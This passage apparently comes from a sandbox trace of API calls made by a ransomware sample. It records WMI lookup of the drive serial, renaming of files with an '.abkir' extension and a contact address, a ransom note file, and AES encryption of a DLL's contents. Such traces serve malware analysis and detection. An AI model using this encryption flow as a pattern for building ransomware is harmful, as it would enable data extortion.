ppNamespace=0x6d8ebd8 | out: ppNamespace=0x6d8ebd8*=0x603331c) returned 0x0 [0189.580] WbemLocator:IUnknown:QueryInterface (in: This=0x603331c, riid=0x749b1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6d8ea74 | out: ppvObject=0x6d8ea74*=0xb5bf44) returned 0x0 [0189.581] WbemLocator:IClientSecurity:QueryBlanket (in: This=0xb5bf44, pProxy=0x603331c, pAuthnSvc=0x6d8eac4, pAuthzSvc=0x6d8eac0, pServerPrincName=0x6d8eab8, pAuthnLevel=0x6d8eabc, pImpLevel=0x6d8eaac, pAuthInfo=0x6d8eab0, pCapabilites=0x6d8eab4 | out: pAuthnSvc=0x6d8eac4*=0xa, pAuthzSvc=0x6d8eac0*=0x0, pServerPrincName=0x6d8eab8, pAuthnLevel=0x6d8eabc*=0x6, pImpLevel=0x6d8eaac*=0x2, pAuthInfo=0x6d8eab0, pCapabilites=0x6d8eab4*=0x1) returned 0x0 [0189.581] WbemLocator:IUnknown:Release (This=0xb5bf44) returned 0x1 [0189.581] WbemLocator:IUnknown:QueryInterface (in: This=0x603331c, riid=0x749b10f4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6d8ea68 | out: ppvObject=0x6d8ea68*=0xb5bf64) returned 0x0 [0189.581] WbemLocator:IUnknown:QueryInterface (in: This=0x603331c, riid=0x749b1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6d8ea64 | out: ppvObject=0x6d8ea64*=0xb5bf44) returned 0x0 [0189.581] WbemLocator:IClientSecurity:SetBlanket (This=0xb5bf44, pProxy=0x603331c, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0 [0189.581] WbemLocator:IUnknown:Release (This=0xb5bf44) returned 0x2 [0189.581] WbemLocator:IUnknown:Release (This=0xb5bf64) returned 0x1 [0189.581] CoTaskMemFree (pv=0xbd4a68) [0189.581] WbemLocator:IUnknown:Release (This=0x60276f0) returned 0x0 [0192.830] WbemLocator:IUnknown:QueryInterface (in: This=0x603331c, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6d8e664 | out: ppvObject=0x6d8e664*=0xb5bf64) returned 0x0 [0192.831] WbemLocator:IUnknown:QueryInterface (in: This=0xb5bf64, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x6d8e620 | out: ppvObject=0x6d8e620*=0x0) returned 0x80004002 [0193.053] WbemLocator:IUnknown:QueryInterface (in: This=0xb5bf64, riid=0x74b4fe90*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x6d8e43c | out: ppvObject=0x6d8e43c*=0x0) returned 0x80004002 [0193.054] WbemLocator:IUnknown:AddRef (This=0xb5bf64) returned 0x3 [0193.054] WbemLocator:IUnknown:QueryInterface (in: This=0xb5bf64, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x6d8df7c | out: ppvObject=0x6d8df7c*=0x0) returned 0x80004002 [0193.054] WbemLocator:IUnknown:QueryInterface (in: This=0xb5bf64, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x6d8df2c | out: ppvObject=0x6d8df2c*=0x0) returned 0x80004002 [0193.055] WbemLocator:IUnknown:QueryInterface (in: This=0xb5bf64, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6d8df38 | out: ppvObject=0x6d8df38*=0xb5bec4) returned 0x0 [0193.055] WbemLocator:IMarshal:GetUnmarshalClass (in: This=0xb5bec4, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x6d8df40 | out: pCid=0x6d8df40*(Data1=0x17, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0193.055] WbemLocator:IUnknown:Release (This=0xb5bec4) returned 0x3 [0193.055] CoGetContextToken (in: pToken=0x6d8df98 | out: pToken=0x6d8df98) returned 0x0 [0193.055] CoGetContextToken (in: pToken=0x6d8e3a0 | out: pToken=0x6d8e3a0) returned 0x0 [0193.055] WbemLocator:IUnknown:QueryInterface (in: This=0xb5bf64, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6d8e430 | out: ppvObject=0x6d8e430*=0xb5bf4c) returned 0x0 [0193.055] WbemLocator:IRpcOptions:Query (in: This=0xb5bf4c, pPrx=0xb5bf64, dwProperty=2, pdwValue=0x6d8e458 | out: pdwValue=0x6d8e458) returned 0x80004002 [0193.055] WbemLocator:IUnknown:Release (This=0xb5bf4c) returned 0x3 [0193.055] WbemLocator:IUnknown:Release (This=0xb5bf64) returned 0x2 [0193.055] CoGetContextToken (in: pToken=0x6d8e978 | out: pToken=0x6d8e978) returned 0x0 [0193.055] CoGetContextToken (in: pToken=0x6d8e8d8 | out: pToken=0x6d8e8d8) returned 0x0 [0193.055] WbemLocator:IUnknown:QueryInterface (in: This=0xb5bf64, riid=0x6d8e9a8*(Data1=0x9556dc99, Data2=0x828c, Data3=0x11cf, Data4=([0]=0xa3, [1]=0x7e, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x32, [6]=0x40, [7]=0xc7)), ppvObject=0x6d8e9a4 | out: ppvObject=0x6d8e9a4*=0x603331c) returned 0x0 [0193.055] WbemLocator:IUnknown:AddRef (This=0x603331c) returned 0x4 [0193.055] WbemLocator:IUnknown:Release (This=0x603331c) returned 0x3 [0193.055] WbemLocator:IUnknown:Release (This=0x603331c) returned 0x2 [0193.055] SysStringLen (param_1=0x0) returned 0x0 [0193.056] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6031120, puCount=0x6d8ed3c | out: puCount=0x6d8ed3c*=0x0) returned 0x0 [0193.056] WbemDefPath:IWbemPath:GetText (in: This=0x6031120, lFlags=2, puBuffLength=0x6d8ed38*=0x0, pszText=0x0 | out: puBuffLength=0x6d8ed38*=0x20, pszText=0x0) returned 0x0 [0193.056] WbemDefPath:IWbemPath:GetText (in: This=0x6031120, lFlags=2, puBuffLength=0x6d8ed38*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x6d8ed38*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0193.056] CoGetContextToken (in: pToken=0x6d8e9a8 | out: pToken=0x6d8e9a8) returned 0x0 [0193.056] WbemLocator:IUnknown:AddRef (This=0xb5bf64) returned 0x3 [0193.056] WbemLocator:IUnknown:QueryInterface (in: This=0xb5bf64, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6d8e83c | out: ppvObject=0x6d8e83c*=0xb5bf64) returned 0x0 [0193.056] WbemLocator:IUnknown:Release (This=0xb5bf64) returned 0x3 [0193.056] WbemLocator:IUnknown:Release (This=0xb5bf64) returned 0x2 [0193.056] WbemDefPath:IWbemPath:GetText (in: This=0x6031120, lFlags=2, puBuffLength=0x6d8ed40*=0x0, pszText=0x0 | out: puBuffLength=0x6d8ed40*=0x20, pszText=0x0) returned 0x0 [0193.056] WbemDefPath:IWbemPath:GetText (in: This=0x6031120, lFlags=2, puBuffLength=0x6d8ed40*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x6d8ed40*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0193.056] IWbemServices:GetObject (in: This=0x603331c, strObjectPath="win32_logicaldisk.deviceid=\"C:\"", lFlags=0, pCtx=0x0, ppObject=0x6d8ecf4*=0x0, ppCallResult=0x0 | out: ppObject=0x6d8ecf4*=0x60287e0, ppCallResult=0x0) returned 0x0 [0193.648] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6031190, puCount=0x6d8ecf4 | out: puCount=0x6d8ecf4*=0x2) returned 0x0 [0193.648] WbemDefPath:IWbemPath:GetText (in: This=0x6031190, lFlags=4, puBuffLength=0x6d8ecf0*=0x0, pszText=0x0 | out: puBuffLength=0x6d8ecf0*=0xf, pszText=0x0) returned 0x0 [0193.648] WbemDefPath:IWbemPath:GetText (in: This=0x6031190, lFlags=4, puBuffLength=0x6d8ecf0*=0xf, pszText="00000000000000" | out: puBuffLength=0x6d8ecf0*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0193.648] IWbemClassObject:Get (in: This=0x60287e0, wszName="VolumeSerialNumber", lFlags=0, pVal=0x6d8ecf0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x3780dd8*=0, plFlavor=0x3780ddc*=0 | out: pVal=0x6d8ecf0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="9C354B42", varVal2=0x0), pType=0x3780dd8*=8, plFlavor=0x3780ddc*=0) returned 0x0 [0193.648] SysStringByteLen (bstr="9C354B42") returned 0x10 [0193.648] SysStringByteLen (bstr="9C354B42") returned 0x10 [0193.649] IWbemClassObject:Get (in: This=0x60287e0, wszName="VolumeSerialNumber", lFlags=0, pVal=0x6d8ecf8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x3780dd8*=8, plFlavor=0x3780ddc*=0 | out: pVal=0x6d8ecf8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="9C354B42", varVal2=0x0), pType=0x3780dd8*=8, plFlavor=0x3780ddc*=0) returned 0x0 [0193.649] SysStringByteLen (bstr="9C354B42") returned 0x10 [0193.649] SysStringByteLen (bstr="9C354B42") returned 0x10 [0193.649] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\offfiltx.dll", nBufferLength=0x105, lpBuffer=0x6d8e8f8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\offfiltx.dll", lpFilePart=0x0) returned 0x43 [0193.649] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\offfiltx.dll.id-9C354B42.[pewpew@TuTa.io].abkir", nBufferLength=0x105, lpBuffer=0x6d8e8f8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\offfiltx.dll.id-9C354B42.[pewpew@TuTa.io].abkir", lpFilePart=0x0) returned 0x66 [0193.649] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6d8ed58) returned 1 [0193.649] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\offfiltx.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\filters\\offfiltx.dll"), fInfoLevelId=0x0, lpFileInformation=0x6d8edd4 | out: lpFileInformation=0x6d8edd4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4e922100, ftCreationTime.dwHighDateTime=0x1caafc8, ftLastAccessTime.dwLowDateTime=0x596c1850, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x2ac60580, ftLastWriteTime.dwHighDateTime=0x1d68bad, nFileSizeHigh=0x0, nFileSizeLow=0x20)) returned 1 [0193.649] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6d8ed54) returned 1 [0193.649] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\offfiltx.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\filters\\offfiltx.dll"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\offfiltx.dll.id-9C354B42.[pewpew@TuTa.io].abkir" (normalized: "c:\\program files\\common files\\microsoft shared\\filters\\offfiltx.dll.id-9c354b42.[pewpew@tuta.io].abkir")) returned 1 [0193.650] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\VISFILT.DLL", nBufferLength=0x105, lpBuffer=0x6d8e910, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\VISFILT.DLL", lpFilePart=0x0) returned 0x42 [0193.650] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\info-decrypt.hta", nBufferLength=0x105, lpBuffer=0x6d8e918, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\info-decrypt.hta", lpFilePart=0x0) returned 0x47 [0193.650] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6d8ed78) returned 1 [0193.651] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\info-decrypt.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\filters\\info-decrypt.hta"), fInfoLevelId=0x0, lpFileInformation=0x6d8edf4 | out: lpFileInformation=0x6d8edf4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x24ecc4a0, ftCreationTime.dwHighDateTime=0x1d68bad, ftLastAccessTime.dwLowDateTime=0x24ecc4a0, ftLastAccessTime.dwHighDateTime=0x1d68bad, ftLastWriteTime.dwLowDateTime=0x24ecc4a0, ftLastWriteTime.dwHighDateTime=0x1d68bad, nFileSizeHigh=0x0, nFileSizeLow=0x155e)) returned 1 [0193.651] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6d8ed74) returned 1 [0193.651] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\VISFILT.DLL", nBufferLength=0x105, lpBuffer=0x6d8e918, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\VISFILT.DLL", lpFilePart=0x0) returned 0x42 [0193.651] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6d8edc4) returned 1 [0193.651] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\VISFILT.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\filters\\visfilt.dll"), fInfoLevelId=0x0, lpFileInformation=0x37813e8 | out: lpFileInformation=0x37813e8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x46d35b00, ftCreationTime.dwHighDateTime=0x1cba077, ftLastAccessTime.dwLowDateTime=0xd9e40080, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x46d35b00, ftLastWriteTime.dwHighDateTime=0x1cba077, nFileSizeHigh=0x0, nFileSizeLow=0x206b78)) returned 1 [0193.652] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6d8edc0) returned 1 [0193.652] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\VISFILT.DLL", nBufferLength=0x105, lpBuffer=0x6d8e804, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\VISFILT.DLL", lpFilePart=0x0) returned 0x42 [0193.652] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6d8ecf8) returned 1 [0193.652] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\VISFILT.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\filters\\visfilt.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x45c [0193.652] GetFileType (hFile=0x45c) returned 0x1 [0193.652] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6d8ecf4) returned 1 [0193.652] GetFileType (hFile=0x45c) returned 0x1 [0193.652] GetFileSize (in: hFile=0x45c, lpFileSizeHigh=0x6d8ee00 | out: lpFileSizeHigh=0x6d8ee00*=0x0) returned 0x206b78 [0193.660] ReadFile (in: hFile=0x45c, lpBuffer=0x7180970, nNumberOfBytesToRead=0x206b78, lpNumberOfBytesRead=0x6d8edac, lpOverlapped=0x0 | out: lpBuffer=0x7180970*, lpNumberOfBytesRead=0x6d8edac*=0x206b78, lpOverlapped=0x0) returned 1 [0193.927] CloseHandle (hObject=0x45c) returned 1 [0193.928] CryptAcquireContextW (in: phProv=0x6d8ed4c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x6d8ed4c*=0x66bb488) returned 1 [0193.929] CryptGenRandom (in: hProv=0x66bb488, dwLen=0x10, pbBuffer=0x3781ca0 | out: pbBuffer=0x3781ca0) returned 1 [0194.499] CryptImportKey (in: hProv=0x66bb488, pbData=0x3831a14, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x6d8ed1c | out: phKey=0x6d8ed1c*=0xb7f9d0) returned 1 [0194.500] CryptContextAddRef (hProv=0x66bb488, pdwReserved=0x0, dwFlags=0x0) returned 1 [0194.500] CryptContextAddRef (hProv=0x66bb488, pdwReserved=0x0, dwFlags=0x0) returned 1 [0194.500] CryptDuplicateKey (in: hKey=0xb7f9d0, pdwReserved=0x0, dwFlags=0x0, phKey=0x6d8ed0c | out: phKey=0x6d8ed0c*=0xb7fa50) returned 1 [0194.500] CryptContextAddRef (hProv=0x66bb488, pdwReserved=0x0, dwFlags=0x0) returned 1 [0194.500] CryptSetKeyParam (hKey=0xb7fa50, dwParam=0x4, pbData=0x3831af4*=0x1, dwFlags=0x0) returned 1 [0194.500] CryptSetKeyParam (hKey=0xb7fa50, dwParam=0x1, pbData=0x3831ac0, dwFlags=0x0) returned 1 [0194.508] CryptEncrypt (in: hKey=0xb7fa50, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x7387508*, pdwDataLen=0x6d8ed78*=0x206b80, dwBufLen=0x206b80 | out: pbData=0x7387508*, pdwDataLen=0x6d8ed78*=0x206b80) returned 1 [0194.847] CryptEncrypt (in: hKey=0xb7fa50, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3831b1c*, pdwDataLen=0x6d8ed80*=0x0, dwBufLen=0x10 | out: pbData=0x3831b1c*, pdwDataLen=0x6d8ed80*=0x10) returned 1 [0194.848] CryptDestroyKey (hKey=0xb7f9d0) returned 1 [0194.848] CryptReleaseContext (hProv=0x66bb488, dwFlags=0x0) returned 1 [0194.848] CryptReleaseContext (hProv=0x66bb488, dwFlags=0x0) returned 1 [0194.848] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\VISFILT.DLL", nBufferLength=0x105, lpBuffer=0x6d8e7f0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\VISFILT.DLL", lpFilePart=0x0) returned 0x42 [0194.848] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6d8ece4) returned 1 [0194.849] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\VISFILT.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\filters\\visfilt.dll"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x598 [0194.849] GetFileType (hFile=0x598) returned 0x1 [0194.849] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6d8ece0) returned 1 [0194.849] GetFileType (hFile=0x598) returned 0x1 [0194.850] WriteFile (in: hFile=0x598, lpBuffer=0x38da484*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x6d8ed74, lpOverlapped=0x0 | out: lpBuffer=0x38da484*, lpNumberOfBytesWritten=0x6d8ed74*=0x20, lpOverlapped=0x0) returned 1 [0194.850] CloseHandle (hObject=0x598) returned 1 [0194.850] CoTaskMemAlloc (cb=0x20c) returned 0xbed438 [0194.850] SHGetFolderPathW (in: hwnd=0x0, csidl=37, hToken=0x0, dwFlags=0x0, pszPath=0xbed438 | out: pszPath="C:\\Windows\\system32") returned 0x0 [0194.850] CoTaskMemFree (pv=0xbed438) [0194.850] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x6d8e7d8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0194.851] CoGetObjectContext (in: riid=0x34d7b34*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x6d8ed20 | out: ppv=0x6d8ed20*=0xb51e34) returned 0x0 [0194.851] IComThreadingInfo:GetCurrentApartmentType (in: This=0xb51e34, pAptType=0x6d8ed18 | out: pAptType=0x6d8ed18*=1) returned 0x0 [0194.851] IUnknown:QueryInterface (in: This=0xb51e34, riid=0x34d7b1c*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x6d8ed1c | out: ppvObject=0x6d8ed1c*=0x0) returned 0x80004002 [0194.851] IUnknown:Release (This=0xb51e34) returned 0x1 [0194.852] CoGetClassObject (in: rclsid=0xb594e4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x6d8e688 | out: ppv=0x6d8e688*=0x60277d0) returned 0x0 [0194.852] WbemDefPath:IUnknown:QueryInterface (in: This=0x60277d0, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x6d8e8a0 | out: ppvObject=0x6d8e8a0*=0x0) returned 0x80004002 [0194.852] WbemDefPath:IClassFactory:CreateInstance (in: This=0x60277d0, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6d8e8b4 | out: ppvObject=0x6d8e8b4*=0x6030b00) returned 0x0 [0194.852] WbemDefPath:IUnknown:Release (This=0x60277d0) returned 0x0 [0194.852] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030b00, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6d8e4d4 | out: ppvObject=0x6d8e4d4*=0x6030b00) returned 0x0 [0194.852] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030b00, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x6d8e490 | out: ppvObject=0x6d8e490*=0x0) returned 0x80004002 [0194.852] WbemDefPath:IUnknown:AddRef (This=0x6030b00) returned 0x3 [0194.852] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030b00, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x6d8ddec | out: ppvObject=0x6d8ddec*=0x0) returned 0x80004002 [0194.852] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030b00, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x6d8dd9c | out: ppvObject=0x6d8dd9c*=0x0) returned 0x80004002 [0194.852] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030b00, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6d8dda8 | out: ppvObject=0x6d8dda8*=0x66ccc38) returned 0x0 [0194.853] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x66ccc38, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x6d8ddb0 | out: pCid=0x6d8ddb0*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0194.853] WbemDefPath:IUnknown:Release (This=0x66ccc38) returned 0x3 [0194.853] CoGetContextToken (in: pToken=0x6d8de08 | out: pToken=0x6d8de08) returned 0x0 [0194.853] CoGetContextToken (in: pToken=0x6d8e210 | out: pToken=0x6d8e210) returned 0x0 [0194.853] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030b00, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6d8e2a0 | out: ppvObject=0x6d8e2a0*=0x0) returned 0x80004002 [0194.853] WbemDefPath:IUnknown:Release (This=0x6030b00) returned 0x2 [0194.853] WbemDefPath:IUnknown:Release (This=0x6030b00) returned 0x1 [0194.853] CoGetContextToken (in: pToken=0x6d8eb98 | out: pToken=0x6d8eb98) returned 0x0 [0194.853] CoGetContextToken (in: pToken=0x6d8eaf8 | out: pToken=0x6d8eaf8) returned 0x0 [0194.853] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030b00, riid=0x6d8ebc8*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x6d8ebc4 | out: ppvObject=0x6d8ebc4*=0x6030b00) returned 0x0 [0194.853] WbemDefPath:IUnknown:AddRef (This=0x6030b00) returned 0x3 [0194.853] WbemDefPath:IUnknown:Release (This=0x6030b00) returned 0x2 [0194.853] WbemDefPath:IWbemPath:SetText (This=0x6030b00, uMode=0x4, pszPath="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0194.853] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6030b00, puCount=0x6d8ed4c | out: puCount=0x6d8ed4c*=0x0) returned 0x0 [0194.853] WbemDefPath:IWbemPath:GetText (in: This=0x6030b00, lFlags=2, puBuffLength=0x6d8ed48*=0x0, pszText=0x0 | out: puBuffLength=0x6d8ed48*=0x20, pszText=0x0) returned 0x0 [0194.853] WbemDefPath:IWbemPath:GetText (in: This=0x6030b00, lFlags=2, puBuffLength=0x6d8ed48*=0x20, pszText="0000000000000000000000000000000" | out: 